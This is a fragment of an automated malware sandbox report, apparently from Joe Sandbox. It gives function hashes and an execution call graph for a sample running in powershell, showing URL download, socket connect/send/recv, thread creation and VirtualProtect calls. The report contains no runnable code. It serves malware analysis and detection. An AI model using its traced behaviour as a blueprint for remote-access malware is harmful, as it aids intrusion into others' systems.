                                                                                Function 00721730 Relevance: .1, Instructions: 127COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 589 721730-721733 590 721735-721737 589->590 591 721739-721741 589->591 590->591 592 721743-721748 591->592 593 721759-72175d 591->593 594 721749 592->594 595 72174d-721757 592->595 596 721763-721765 593->596 597 72188e-721898 593->597 594->595 598 72174b 594->598 595->593 599 721767-721773 596->599 600 721775 596->600 601 7218a6-7218ac 597->601 602 72189a-7218a3 597->602 598->593 604 721777-721779 599->604 600->604 605 7218b2-7218be 601->605 606 7218ae-7218b0 601->606 604->597 607 72177f-721783 604->607 608 7218c0-7218df 605->608 606->608 610 721796 607->610 611 721785-721794 607->611 612 721798-72179a 610->612 611->612 612->597 614 7217a0-7217a2 612->614 615 7217b2 614->615 616 7217a4-7217b0 614->616 618 7217b4-7217b6 615->618 616->618 618->597 619 7217bc-7217be 618->619 620 7217c0-7217c6 619->620 621 7217d8-7217e3 619->621 622 7217ca-7217d6 620->622 623 7217c8 620->623 624 7217f2-7217fe 621->624 625 7217e5-7217e8 621->625 622->621 623->621 626 721800-721802 624->626 627 72180c-721813 624->627 625->624 626->627 629 72181a-72181c 627->629 630 721834-72188b 629->630 631 72181e-721824 629->631 632 721826 631->632 633 721828-72182a 631->633 632->630 633->630
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438341230.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_720000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ff6ebca688521d8d8f3bdff99905b45e9ada2de0d7be7baed4c9806b78948eae
                                                                                • Instruction ID: 0e32c05cdbf5eb5a924cda8efc6ab2175f326b052a685e054ceca0b980cf7b44
                                                                                • Opcode Fuzzy Hash: ff6ebca688521d8d8f3bdff99905b45e9ada2de0d7be7baed4c9806b78948eae
                                                                                • Instruction Fuzzy Hash: 77412636700221DBDB298E64E4406BAB3E1BFF1321BB885BBD8558B351DB79CD41CB51
                                                                                Function 00720DD3 Relevance: .1, Instructions: 100COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438341230.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_720000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0b696d7958da03316e64f1cdae4031651123c88aa60bb5eac3d788f2e7169616
                                                                                • Instruction ID: 8a745e0850276bd653eff58660bcb4eca2758a96331a785bbc8f19f06aceb53a
                                                                                • Opcode Fuzzy Hash: 0b696d7958da03316e64f1cdae4031651123c88aa60bb5eac3d788f2e7169616
                                                                                • Instruction Fuzzy Hash: 9B312B36B042218FDB15AE74E4546BAB7A1EFD1320B2984AAD4458B252DB39CC91C7F1
                                                                                Function 001DD01D Relevance: .0, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438019746.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_1dd000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9f07c7597c83a8c4462500e4d813b37128bc6538f8fdb4214aef46194b85e335
                                                                                • Instruction ID: f2e8ccc506b1ca50d74f0dc69d11f4b210de71843adccbcd21296b1cda706c6f
                                                                                • Opcode Fuzzy Hash: 9f07c7597c83a8c4462500e4d813b37128bc6538f8fdb4214aef46194b85e335
                                                                                • Instruction Fuzzy Hash: A501A771504340AEE7144A15EC84B6BBB98DFC1724F18C55BFD490B382C3799D45CAB1
                                                                                Function 001DD006 Relevance: .0, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438019746.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_1dd000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3ad282f47db868c485d12c41e505c1a57e06af6a9d91c0dbb528b5ad34b075b8
                                                                                • Instruction ID: fb66700c74e2d23876b6d170a4fe90a2221e62255db5be76dc7b559da5a6f319
                                                                                • Opcode Fuzzy Hash: 3ad282f47db868c485d12c41e505c1a57e06af6a9d91c0dbb528b5ad34b075b8
                                                                                • Instruction Fuzzy Hash: 0C01756150D3C09FD7128B259C94B56BFB4DF53624F19C1DBE8888F2A3C2699C45C772
                                                                                Function 00721B7F Relevance: .0, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438341230.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_720000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: be87a07977524bcf3d15926baa15fc9327b4ce546cc80640477fa17137c68703
                                                                                • Instruction ID: 91b52bfb67051b9af28a30956cc99613dc7df7ec817780a77f8a5756d3edc648
                                                                                • Opcode Fuzzy Hash: be87a07977524bcf3d15926baa15fc9327b4ce546cc80640477fa17137c68703
                                                                                • Instruction Fuzzy Hash: 42E0D875B042548EDF15A660A0213BD7761BFF2211FA081F6C85097245DA388916C762

                                                                                Non-executed Functions

                                                                                Function 007200A0 Relevance: 15.4, Strings: 12, Instructions: 406COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.438341230.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_720000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (:,$(:,$(:,$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:,$L:,$L:,
                                                                                • API String ID: 0-2198573534
                                                                                • Opcode ID: 1dd4c9b009fe1ac3065ca8fac19e3f7276f1903ee8531a4c337dc82387ea8f67
                                                                                • Instruction ID: 2b10ce4cf1c99a39e576dd924671afeeaf4036219c9a8e4dfba3ad603189fabf
                                                                                • Opcode Fuzzy Hash: 1dd4c9b009fe1ac3065ca8fac19e3f7276f1903ee8531a4c337dc82387ea8f67
                                                                                • Instruction Fuzzy Hash: 72D12531B00268EFDF159E64E814BBE77A2BF85310F14806AE9059B293CB79DD51CBE1

                                                                                Execution Graph

                                                                                Execution Coverage:5.9%
                                                                                Dynamic/Decrypted Code Coverage:19.6%
                                                                                Signature Coverage:3.9%
                                                                                Total number of Nodes:1519
                                                                                Total number of Limit Nodes:43
                                                                                execution_graph 53002 415d41 53017 41b411 53002->53017 53004 415d4a 53028 4020f6 53004->53028 53009 4170c4 53052 401e8d 53009->53052 53013 401fd8 11 API calls 53014 4170d9 53013->53014 53015 401fd8 11 API calls 53014->53015 53016 4170e5 53015->53016 53058 4020df 53017->53058 53022 41b456 InternetReadFile 53026 41b479 53022->53026 53024 41b4a6 InternetCloseHandle InternetCloseHandle 53025 41b4b8 53024->53025 53025->53004 53026->53022 53026->53024 53027 401fd8 11 API calls 53026->53027 53069 4020b7 53026->53069 53027->53026 53029 40210c 53028->53029 53030 4023ce 11 API calls 53029->53030 53031 402126 53030->53031 53032 402569 28 API calls 53031->53032 53033 402134 53032->53033 53034 404aa1 53033->53034 53035 404ab4 53034->53035 53136 40520c 53035->53136 53037 404ac9 ctype 53038 404b40 WaitForSingleObject 53037->53038 53039 404b20 53037->53039 53041 404b56 53038->53041 53040 404b32 send 53039->53040 53042 404b7b 53040->53042 53142 4210cb 54 API calls 53041->53142 53044 401fd8 11 API calls 53042->53044 53046 404b83 53044->53046 53045 404b69 SetEvent 53045->53042 53047 401fd8 11 API calls 53046->53047 53048 404b8b 53047->53048 53048->53009 53049 401fd8 53048->53049 53050 4023ce 11 API calls 53049->53050 53051 401fe1 53050->53051 53051->53009 53053 402163 53052->53053 53054 40219f 53053->53054 53160 402730 11 API calls 53053->53160 53054->53013 53056 402184 53161 402712 11 API calls std::_Deallocate 53056->53161 53059 4020e7 53058->53059 53075 4023ce 53059->53075 53061 4020f2 53062 43bda0 53061->53062 53068 4461b8 __Getctype 53062->53068 53063 4461f6 53091 44062d 20 API calls _free 53063->53091 53064 4461e1 RtlAllocateHeap 53066 41b42f InternetOpenW InternetOpenUrlW 53064->53066 53064->53068 53066->53022 53068->53063 53068->53064 53090 443001 7 API calls 2 library calls 53068->53090 53070 4020bf 53069->53070 53071 4023ce 11 API calls 53070->53071 53072 4020ca 53071->53072 53092 40250a 53072->53092 53074 4020d9 53074->53026 53076 402428 53075->53076 53077 4023d8 53075->53077 53076->53061 53077->53076 53079 4027a7 53077->53079 53080 402e21 53079->53080 53083 4016b4 53080->53083 53082 402e30 53082->53076 53084 4016c6 53083->53084 53085 4016cb 53083->53085 53089 43bd68 11 API calls _Atexit 53084->53089 53085->53084 53086 4016f3 53085->53086 53086->53082 53088 43bd67 53089->53088 53090->53068 53091->53066 53093 40251a 53092->53093 53094 402520 53093->53094 53095 402535 53093->53095 53099 402569 53094->53099 53109 4028e8 53095->53109 53098 402533 53098->53074 53120 402888 53099->53120 53101 40257d 53102 402592 53101->53102 53103 4025a7 53101->53103 53125 402a34 22 API calls 53102->53125 53105 4028e8 28 API calls 53103->53105 53108 4025a5 53105->53108 53106 40259b 53126 4029da 22 API calls 53106->53126 53108->53098 53110 4028f1 53109->53110 53111 402953 53110->53111 53112 4028fb 53110->53112 53134 4028a4 22 API calls 53111->53134 53115 402904 53112->53115 53118 402917 53112->53118 53128 402cae 53115->53128 53116 402915 53116->53098 53118->53116 53119 4023ce 11 API calls 53118->53119 53119->53116 53121 402890 53120->53121 53122 402898 53121->53122 53127 402ca3 22 API calls 53121->53127 53122->53101 53125->53106 53126->53108 53129 402cb8 __EH_prolog 53128->53129 53135 402e54 22 API calls 53129->53135 53131 4023ce 11 API calls 53133 402d92 53131->53133 53132 402d24 53132->53131 53133->53116 53135->53132 53137 405214 53136->53137 53138 4023ce 11 API calls 53137->53138 53139 40521f 53138->53139 53143 405234 53139->53143 53141 40522e 53141->53037 53142->53045 53144 405240 53143->53144 53145 40526e 53143->53145 53146 4028e8 28 API calls 53144->53146 53159 4028a4 22 API calls 53145->53159 53148 40524a 53146->53148 53148->53141 53160->53056 53161->53054 53162 10006d60 53163 10006d69 53162->53163 53164 10006d72 53162->53164 53166 10006c5f 53163->53166 53186 10005af6 GetLastError 53166->53186 53168 10006c6c 53206 10006d7e 53168->53206 53170 10006c74 53215 100069f3 53170->53215 53173 10006c8b 53173->53164 53176 10006cce 53240 1000571e 19 API calls __dosmaperr 53176->53240 53180 10006cc9 53239 10006368 19 API calls _abort 53180->53239 53182 10006d12 53182->53176 53242 100068c9 25 API calls 53182->53242 53183 10006ce6 53183->53182 53241 1000571e 19 API calls __dosmaperr 53183->53241 53187 10005b12 53186->53187 53188 10005b0c 53186->53188 53192 10005b61 SetLastError 53187->53192 53244 1000637b 19 API calls 2 library calls 53187->53244 53243 10005e08 10 API calls 2 library calls 53188->53243 53191 10005b24 53193 10005b2c 53191->53193 53246 10005e5e 10 API calls 2 library calls 53191->53246 53192->53168 53245 1000571e 19 API calls __dosmaperr 53193->53245 53196 10005b41 53196->53193 53197 10005b48 53196->53197 53247 1000593c 19 API calls _abort 53197->53247 53198 10005b32 53200 10005b6d SetLastError 53198->53200 53249 100055a8 36 API calls _abort 53200->53249 53201 10005b53 53248 1000571e 19 API calls __dosmaperr 53201->53248 53205 10005b5a 53205->53192 53205->53200 53207 10006d8a ___DestructExceptionObject 53206->53207 53208 10005af6 _abort 36 API calls 53207->53208 53213 10006d94 53208->53213 53210 10006e18 _abort 53210->53170 53213->53210 53250 100055a8 36 API calls _abort 53213->53250 53251 10005671 RtlEnterCriticalSection 53213->53251 53252 1000571e 19 API calls __dosmaperr 53213->53252 53253 10006e0f RtlLeaveCriticalSection _abort 53213->53253 53254 100054a7 53215->53254 53218 10006a14 GetOEMCP 53220 10006a3d 53218->53220 53219 10006a26 53219->53220 53221 10006a2b GetACP 53219->53221 53220->53173 53222 100056d0 53220->53222 53221->53220 53223 1000570e 53222->53223 53228 100056de _abort 53222->53228 53265 10006368 19 API calls _abort 53223->53265 53224 100056f9 RtlAllocateHeap 53226 1000570c 53224->53226 53224->53228 53226->53176 53229 10006e20 53226->53229 53228->53223 53228->53224 53264 1000474f 7 API calls 2 library calls 53228->53264 53230 100069f3 38 API calls 53229->53230 53231 10006e3f 53230->53231 53234 10006e90 IsValidCodePage 53231->53234 53236 10006e46 53231->53236 53238 10006eb5 ___scrt_fastfail 53231->53238 53233 10006cc1 53233->53180 53233->53183 53235 10006ea2 GetCPInfo 53234->53235 53234->53236 53235->53236 53235->53238 53276 10002ada 53236->53276 53266 10006acb GetCPInfo 53238->53266 53239->53176 53240->53173 53241->53182 53242->53176 53243->53187 53244->53191 53245->53198 53246->53196 53247->53201 53248->53205 53251->53213 53252->53213 53253->53213 53255 100054c4 53254->53255 53261 100054ba 53254->53261 53256 10005af6 _abort 36 API calls 53255->53256 53255->53261 53257 100054e5 53256->53257 53262 10007a00 36 API calls __fassign 53257->53262 53259 100054fe 53263 10007a2d 36 API calls __fassign 53259->53263 53261->53218 53261->53219 53262->53259 53263->53261 53264->53228 53265->53226 53267 10006baf 53266->53267 53272 10006b05 53266->53272 53269 10002ada _ValidateLocalCookies 5 API calls 53267->53269 53271 10006c5b 53269->53271 53271->53236 53283 100086e4 53272->53283 53275 10008a3e 41 API calls 53275->53267 53277 10002ae3 53276->53277 53278 10002ae5 IsProcessorFeaturePresent 53276->53278 53277->53233 53280 10002b58 53278->53280 53353 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53280->53353 53282 10002c3b 53282->53233 53284 100054a7 __fassign 36 API calls 53283->53284 53285 10008704 MultiByteToWideChar 53284->53285 53287 10008742 53285->53287 53288 100087da 53285->53288 53291 100056d0 20 API calls 53287->53291 53294 10008763 ___scrt_fastfail 53287->53294 53289 10002ada _ValidateLocalCookies 5 API calls 53288->53289 53292 10006b66 53289->53292 53290 100087d4 53302 10008801 19 API calls _free 53290->53302 53291->53294 53297 10008a3e 53292->53297 53294->53290 53295 100087a8 MultiByteToWideChar 53294->53295 53295->53290 53296 100087c4 GetStringTypeW 53295->53296 53296->53290 53298 100054a7 __fassign 36 API calls 53297->53298 53299 10008a51 53298->53299 53303 10008821 53299->53303 53302->53288 53304 1000883c 53303->53304 53305 10008862 MultiByteToWideChar 53304->53305 53306 10008a16 53305->53306 53307 1000888c 53305->53307 53308 10002ada _ValidateLocalCookies 5 API calls 53306->53308 53310 100056d0 20 API calls 53307->53310 53314 100088ad 53307->53314 53309 10006b87 53308->53309 53309->53275 53310->53314 53311 100088f6 MultiByteToWideChar 53312 10008962 53311->53312 53313 1000890f 53311->53313 53339 10008801 19 API calls _free 53312->53339 53330 10005f19 53313->53330 53314->53311 53314->53312 53318 10008971 53320 100056d0 20 API calls 53318->53320 53323 10008992 53318->53323 53319 10008939 53319->53312 53321 10005f19 10 API calls 53319->53321 53320->53323 53321->53312 53322 10008a07 53338 10008801 19 API calls _free 53322->53338 53323->53322 53324 10005f19 10 API calls 53323->53324 53326 100089e6 53324->53326 53326->53322 53327 100089f5 WideCharToMultiByte 53326->53327 53327->53322 53328 10008a35 53327->53328 53340 10008801 19 API calls _free 53328->53340 53341 10005c45 53330->53341 53332 10005f40 53335 10005f49 53332->53335 53345 10005fa1 9 API calls 2 library calls 53332->53345 53334 10005f89 LCMapStringW 53334->53335 53336 10002ada _ValidateLocalCookies 5 API calls 53335->53336 53337 10005f9b 53336->53337 53337->53312 53337->53318 53337->53319 53338->53312 53339->53306 53340->53312 53342 10005c71 53341->53342 53344 10005c75 __crt_fast_encode_pointer 53341->53344 53342->53344 53346 10005ce1 53342->53346 53344->53332 53345->53334 53347 10005d02 LoadLibraryExW 53346->53347 53349 10005cf7 53346->53349 53348 10005d1f GetLastError 53347->53348 53350 10005d37 53347->53350 53348->53350 53351 10005d2a LoadLibraryExW 53348->53351 53349->53342 53350->53349 53352 10005d4e FreeLibrary 53350->53352 53351->53350 53352->53349 53353->53282 53354 434906 53359 434bd8 SetUnhandledExceptionFilter 53354->53359 53356 43490b pre_c_initialization 53360 4455cc 20 API calls 2 library calls 53356->53360 53358 434916 53359->53356 53360->53358 53361 1000c7a7 53362 1000c7be 53361->53362 53367 1000c82c 53361->53367 53362->53367 53371 1000c7e6 GetModuleHandleA 53362->53371 53363 1000c872 53364 1000c835 GetModuleHandleA 53366 1000c83f 53364->53366 53366->53366 53366->53367 53367->53363 53367->53364 53372 1000c7ef 53371->53372 53378 1000c82c 53371->53378 53381 1000c803 53372->53381 53374 1000c835 GetModuleHandleA 53376 1000c83f 53374->53376 53375 1000c872 53376->53376 53376->53378 53378->53374 53378->53375 53382 1000c809 53381->53382 53383 1000c82c 53382->53383 53384 1000c80d VirtualProtect 53382->53384 53386 1000c872 53383->53386 53387 1000c835 GetModuleHandleA 53383->53387 53384->53383 53385 1000c81c VirtualProtect 53384->53385 53385->53383 53388 1000c83f 53387->53388 53388->53383 53389 43bea8 53390 43beb4 _swprintf CallCatchBlock 53389->53390 53391 43bec2 53390->53391 53393 43beec 53390->53393 53405 44062d 20 API calls _free 53391->53405 53400 445909 EnterCriticalSection 53393->53400 53395 43bec7 __cftoe CallCatchBlock 53396 43bef7 53401 43bf98 53396->53401 53400->53396 53403 43bfa6 53401->53403 53402 43bf02 53406 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 53402->53406 53403->53402 53407 4497ec 37 API calls 2 library calls 53403->53407 53405->53395 53406->53395 53407->53403 53408 4458c8 53409 4458d3 53408->53409 53411 4458fc 53409->53411 53412 4458f8 53409->53412 53414 448b04 53409->53414 53421 445920 DeleteCriticalSection 53411->53421 53422 44854a 53414->53422 53417 448b49 InitializeCriticalSectionAndSpinCount 53418 448b34 53417->53418 53429 43502b 53418->53429 53420 448b60 53420->53409 53421->53412 53423 448576 53422->53423 53424 44857a 53422->53424 53423->53424 53426 44859a 53423->53426 53436 4485e6 53423->53436 53424->53417 53424->53418 53426->53424 53427 4485a6 GetProcAddress 53426->53427 53428 4485b6 __crt_fast_encode_pointer 53427->53428 53428->53424 53430 435036 IsProcessorFeaturePresent 53429->53430 53431 435034 53429->53431 53433 435078 53430->53433 53431->53420 53443 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53433->53443 53435 43515b 53435->53420 53437 448607 LoadLibraryExW 53436->53437 53441 4485fc 53436->53441 53438 448624 GetLastError 53437->53438 53439 44863c 53437->53439 53438->53439 53442 44862f LoadLibraryExW 53438->53442 53440 448653 FreeLibrary 53439->53440 53439->53441 53440->53441 53441->53423 53442->53439 53443->53435 53444 41e04e 53445 41e063 ctype ___scrt_fastfail 53444->53445 53446 41e266 53445->53446 53447 432f55 21 API calls 53445->53447 53452 41e21a 53446->53452 53458 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 53446->53458 53451 41e213 ___scrt_fastfail 53447->53451 53449 41e277 53449->53452 53459 432f55 53449->53459 53451->53452 53453 432f55 21 API calls 53451->53453 53456 41e240 ___scrt_fastfail 53453->53456 53454 41e2b0 ___scrt_fastfail 53454->53452 53464 4335db 53454->53464 53456->53452 53457 432f55 21 API calls 53456->53457 53457->53446 53458->53449 53460 432f63 53459->53460 53461 432f5f 53459->53461 53462 43bda0 new 21 API calls 53460->53462 53461->53454 53463 432f68 53462->53463 53463->53454 53467 4334fa 53464->53467 53466 4335e3 53466->53452 53468 433513 53467->53468 53472 433509 53467->53472 53469 432f55 21 API calls 53468->53469 53468->53472 53470 433534 53469->53470 53470->53472 53473 4338c8 CryptAcquireContextA 53470->53473 53472->53466 53474 4338e4 53473->53474 53475 4338e9 CryptGenRandom 53473->53475 53474->53472 53475->53474 53476 4338fe CryptReleaseContext 53475->53476 53476->53474 53477 426c6d 53483 426d42 recv 53477->53483 53484 426a77 53485 426a8c 53484->53485 53492 426b1e 53484->53492 53486 426b83 53485->53486 53487 426b0e 53485->53487 53488 426bae 53485->53488 53485->53492 53494 426b4e 53485->53494 53496 426ad9 53485->53496 53498 426bd5 53485->53498 53512 424f6e 49 API calls ctype 53485->53512 53486->53488 53516 425781 21 API calls 53486->53516 53487->53492 53487->53494 53514 424f6e 49 API calls ctype 53487->53514 53488->53492 53488->53498 53500 425b72 53488->53500 53494->53486 53494->53492 53515 41fbfd 52 API calls 53494->53515 53496->53487 53496->53492 53513 41fbfd 52 API calls 53496->53513 53498->53492 53517 4261e6 28 API calls 53498->53517 53503 425b91 ___scrt_fastfail 53500->53503 53501 425ba0 53502 425bc5 53501->53502 53504 425ba5 53501->53504 53519 420669 46 API calls 53501->53519 53502->53498 53503->53501 53503->53502 53518 41ec4c 21 API calls 53503->53518 53504->53502 53508 425bae 53504->53508 53520 41daf0 49 API calls 53504->53520 53508->53502 53521 424d96 21 API calls 2 library calls 53508->53521 53510 425c48 53510->53502 53511 432f55 21 API calls 53510->53511 53511->53504 53512->53496 53513->53496 53514->53494 53515->53494 53516->53488 53517->53492 53518->53501 53519->53510 53520->53508 53521->53502 53522 4165db 53533 401e65 53522->53533 53524 4165eb 53525 4020f6 28 API calls 53524->53525 53526 4165f6 53525->53526 53527 401e65 22 API calls 53526->53527 53528 416601 53527->53528 53529 4020f6 28 API calls 53528->53529 53530 41660c 53529->53530 53538 412965 53530->53538 53534 401e6d 53533->53534 53535 401e75 53534->53535 53557 402158 22 API calls 53534->53557 53535->53524 53558 40482d 53538->53558 53540 412979 53565 4048c8 connect 53540->53565 53544 41299a 53630 402f10 53544->53630 53547 404aa1 61 API calls 53548 4129ae 53547->53548 53549 401fd8 11 API calls 53548->53549 53550 4129b6 53549->53550 53635 404c10 53550->53635 53553 401fd8 11 API calls 53554 4129cc 53553->53554 53555 401fd8 11 API calls 53554->53555 53556 4129d4 53555->53556 53559 404846 socket 53558->53559 53560 404839 53558->53560 53562 404860 CreateEventW 53559->53562 53563 404842 53559->53563 53653 40489e WSAStartup 53560->53653 53562->53540 53563->53540 53564 40483e 53564->53559 53564->53563 53566 404a1b 53565->53566 53567 4048ee 53565->53567 53568 40497e 53566->53568 53569 404a21 WSAGetLastError 53566->53569 53567->53568 53570 404923 53567->53570 53654 40531e 53567->53654 53625 402f31 53568->53625 53569->53568 53571 404a31 53569->53571 53689 420cf1 27 API calls 53570->53689 53573 404932 53571->53573 53574 404a36 53571->53574 53579 402093 28 API calls 53573->53579 53694 41cb72 30 API calls 53574->53694 53576 40490f 53659 402093 53576->53659 53578 40492b 53578->53573 53582 404941 53578->53582 53583 404a80 53579->53583 53581 404a40 53695 4052fd 28 API calls 53581->53695 53591 404950 53582->53591 53592 404987 53582->53592 53586 402093 28 API calls 53583->53586 53589 404a8f 53586->53589 53594 41b580 80 API calls 53589->53594 53593 402093 28 API calls 53591->53593 53691 421ad1 54 API calls 53592->53691 53597 40495f 53593->53597 53594->53568 53600 402093 28 API calls 53597->53600 53599 40498f 53602 4049c4 53599->53602 53603 404994 53599->53603 53604 40496e 53600->53604 53693 420e97 28 API calls 53602->53693 53607 402093 28 API calls 53603->53607 53608 41b580 80 API calls 53604->53608 53610 4049a3 53607->53610 53611 404973 53608->53611 53609 4049cc 53612 4049f9 CreateEventW CreateEventW 53609->53612 53615 402093 28 API calls 53609->53615 53613 402093 28 API calls 53610->53613 53690 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53611->53690 53612->53568 53614 4049b2 53613->53614 53616 41b580 80 API calls 53614->53616 53618 4049e2 53615->53618 53619 4049b7 53616->53619 53620 402093 28 API calls 53618->53620 53692 421143 52 API calls 53619->53692 53622 4049f1 53620->53622 53623 41b580 80 API calls 53622->53623 53624 4049f6 53623->53624 53624->53612 53626 4020df 11 API calls 53625->53626 53627 402f3d 53626->53627 53628 4032a0 28 API calls 53627->53628 53629 402f59 53628->53629 53629->53544 53746 401fb0 53630->53746 53632 402f1e 53633 402055 11 API calls 53632->53633 53634 402f2d 53633->53634 53634->53547 53636 4020df 11 API calls 53635->53636 53637 404c27 53636->53637 53638 4020df 11 API calls 53637->53638 53648 404c30 53638->53648 53639 43bda0 new 21 API calls 53639->53648 53641 4020b7 28 API calls 53641->53648 53642 404ca1 53776 404e26 WaitForSingleObject 53642->53776 53646 401fd8 11 API calls 53646->53648 53647 401fd8 11 API calls 53649 404cb1 53647->53649 53648->53639 53648->53641 53648->53642 53648->53646 53749 404b96 53648->53749 53755 401fe2 53648->53755 53764 404cc3 53648->53764 53650 401fd8 11 API calls 53649->53650 53651 404cba 53650->53651 53651->53553 53653->53564 53655 4020df 11 API calls 53654->53655 53656 40532a 53655->53656 53696 4032a0 53656->53696 53658 405346 53658->53576 53660 40209b 53659->53660 53661 4023ce 11 API calls 53660->53661 53662 4020a6 53661->53662 53700 4024ed 53662->53700 53665 41b580 53666 41b631 53665->53666 53667 41b596 GetLocalTime 53665->53667 53669 401fd8 11 API calls 53666->53669 53668 40531e 28 API calls 53667->53668 53670 41b5d8 53668->53670 53671 41b639 53669->53671 53704 406383 53670->53704 53673 401fd8 11 API calls 53671->53673 53675 41b641 53673->53675 53675->53570 53676 402f10 28 API calls 53677 41b5f0 53676->53677 53678 406383 28 API calls 53677->53678 53679 41b5fc 53678->53679 53709 40723b 77 API calls 53679->53709 53681 41b60a 53682 401fd8 11 API calls 53681->53682 53683 41b616 53682->53683 53684 401fd8 11 API calls 53683->53684 53685 41b61f 53684->53685 53686 401fd8 11 API calls 53685->53686 53687 41b628 53686->53687 53688 401fd8 11 API calls 53687->53688 53688->53666 53689->53578 53690->53568 53691->53599 53692->53611 53693->53609 53694->53581 53697 4032aa 53696->53697 53698 4028e8 28 API calls 53697->53698 53699 4032c9 53697->53699 53698->53699 53699->53658 53701 4024f9 53700->53701 53702 40250a 28 API calls 53701->53702 53703 4020b1 53702->53703 53703->53665 53710 4051ef 53704->53710 53706 406391 53714 402055 53706->53714 53709->53681 53711 4051fb 53710->53711 53720 405274 53711->53720 53713 405208 53713->53706 53715 402061 53714->53715 53716 4023ce 11 API calls 53715->53716 53717 40207b 53716->53717 53742 40267a 53717->53742 53721 405282 53720->53721 53722 405288 53721->53722 53723 40529e 53721->53723 53731 4025f0 53722->53731 53724 4052f5 53723->53724 53725 4052b6 53723->53725 53740 4028a4 22 API calls 53724->53740 53729 4028e8 28 API calls 53725->53729 53730 40529c 53725->53730 53729->53730 53730->53713 53732 402888 22 API calls 53731->53732 53733 402602 53732->53733 53734 402672 53733->53734 53735 402629 53733->53735 53741 4028a4 22 API calls 53734->53741 53737 4028e8 28 API calls 53735->53737 53739 40263b 53735->53739 53737->53739 53739->53730 53743 40268b 53742->53743 53744 4023ce 11 API calls 53743->53744 53745 40208d 53744->53745 53745->53676 53747 4025f0 28 API calls 53746->53747 53748 401fbd 53747->53748 53748->53632 53750 404ba0 WaitForSingleObject 53749->53750 53751 404bcd recv 53749->53751 53789 421107 54 API calls 53750->53789 53753 404be0 53751->53753 53753->53648 53754 404bbc SetEvent 53754->53753 53756 401ff1 53755->53756 53763 402039 53755->53763 53757 4023ce 11 API calls 53756->53757 53758 401ffa 53757->53758 53759 40203c 53758->53759 53760 402015 53758->53760 53761 40267a 11 API calls 53759->53761 53790 403098 28 API calls 53760->53790 53761->53763 53763->53648 53765 4020df 11 API calls 53764->53765 53775 404cde 53765->53775 53766 404e13 53767 401fd8 11 API calls 53766->53767 53768 404e1c 53767->53768 53768->53648 53769 4041a2 28 API calls 53769->53775 53770 401fe2 28 API calls 53770->53775 53771 401fd8 11 API calls 53771->53775 53773 4020f6 28 API calls 53773->53775 53775->53766 53775->53769 53775->53770 53775->53771 53775->53773 53791 401fc0 53775->53791 53777 404e40 SetEvent CloseHandle 53776->53777 53778 404e57 closesocket 53776->53778 53779 404ca8 53777->53779 53780 404e64 53778->53780 53779->53647 53781 404e7a 53780->53781 54090 4050e4 84 API calls 53780->54090 53782 404e8c WaitForSingleObject 53781->53782 53783 404ece SetEvent CloseHandle 53781->53783 54091 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53782->54091 53783->53779 53786 404e9b SetEvent WaitForSingleObject 54092 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53786->54092 53788 404eb3 SetEvent CloseHandle CloseHandle 53788->53783 53789->53754 53790->53763 53792 401fd2 CreateEventA CreateThread WaitForSingleObject CloseHandle 53791->53792 53793 401fc9 53791->53793 53792->53775 53796 415b25 53792->53796 53795 4025e0 28 API calls 53793->53795 53795->53792 53797 4020f6 28 API calls 53796->53797 53798 415b47 SetEvent 53797->53798 53799 415b5c 53798->53799 53875 4041a2 53799->53875 53802 4020f6 28 API calls 53803 415b86 53802->53803 53804 4020f6 28 API calls 53803->53804 53805 415b98 53804->53805 53878 41beac 53805->53878 53808 415d11 53810 401e8d 11 API calls 53808->53810 53809 415bc1 GetTickCount 53900 41bc1f 